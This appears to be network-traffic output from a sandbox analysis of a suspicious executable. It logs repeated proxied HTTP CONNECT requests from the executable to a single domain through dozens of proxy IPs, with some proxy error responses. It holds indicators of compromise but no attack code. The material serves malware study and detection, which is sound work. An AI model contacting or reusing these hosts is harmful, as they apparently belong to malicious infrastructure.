                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2142192.168.2.455372132.148.128.8184016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.285209894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.834542990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.293356895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2143192.168.2.452032128.199.5.121556376812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.285307884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.300640106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.303020000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.303008080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:03.318643093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:15.404090881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2144192.168.2.452099178.33.167.180648176812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.285310984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.300648928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.303016901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.303037882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:03.318742990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:15.404185057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2145192.168.2.451759103.147.246.2381816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.285465956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2146192.168.2.451927103.174.178.13820106812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.291522026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2147192.168.2.452153109.123.254.43515846812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.298729897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.365631104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.365587950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.365506887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:03.365514994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2148192.168.2.451947207.180.234.220473486812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.320265055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.443670988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.443814993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.443661928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:03.443645954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:15.521785021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2149192.168.2.45214292.204.134.3815556812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.325967073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.443694115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.443814039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.443830967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:03.443661928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2150192.168.2.452131148.72.209.174498166812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.331190109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.365648985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.365668058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.365588903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2151192.168.2.452175103.156.249.1180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.334654093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.366796017 CET19INHTTP/1.1 200 OK
                                                                                                      Feb 23, 2024 09:45:41.411902905 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2152192.168.2.45212038.41.0.62112016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.335602045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.443906069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2153192.168.2.45214394.131.14.6610806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.337116003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.443886042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.443881035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.444259882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:03.443689108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:15.521785021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2154192.168.2.455338148.72.215.230469456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.355699062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2155192.168.2.455560193.239.58.9280816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.356252909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2156192.168.2.455421198.27.82.14395066812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.356440067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.834534883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.293243885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.147109985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2157192.168.2.455580104.20.75.31806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.612391949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.699811935 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:39 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2158192.168.2.45556894.131.109.21931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:39.615407944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.044996023 CET401INHTTP/1.0 407 Proxy Authentication Required
                                                                                                      Proxy-Authenticate: Basic realm="proxy"
                                                                                                      Connection: close
                                                                                                      Content-type: text/html; charset=utf-8
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2159192.168.2.455576185.143.234.2880806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.079781055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.256335020 CET389INHTTP/1.1 400 Bad Request
                                                                                                      Date: Fri, 23 Feb 2024 08:45:40 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 150
                                                                                                      Connection: close
                                                                                                      Server: ArvanCloud
                                                                                                      Server-Timing: total;dur=0
                                                                                                      X-Request-ID: 52eac47f0801ea5f04f21d7e6b70d33c
                                                                                                      X-SID: 6233
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2160192.168.2.454714107.180.90.88160026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.080516100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.178086042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.178095102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2161192.168.2.455398124.105.55.176309066812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.080523968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2162192.168.2.452361146.190.32.18032406812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.080605984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2163192.168.2.452247167.99.39.82460156812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.109208107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2164192.168.2.452038186.215.87.19460026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.534853935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.646874905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.646807909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:52.646766901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:04.646770000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:16.709551096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2165192.168.2.45557891.241.217.5890906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.535149097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2166192.168.2.45219245.188.164.319946812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.541611910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.445028067 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2167192.168.2.452312138.68.16.30134696812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.552160978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2168192.168.2.45223792.205.110.118151156812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.553009987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2169192.168.2.455429103.82.11.23341536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.553533077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2170192.168.2.452163138.0.26.12090106812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.555243015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2171192.168.2.455574171.250.219.21710806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:40.879801035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2172192.168.2.4558835.133.16.17180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
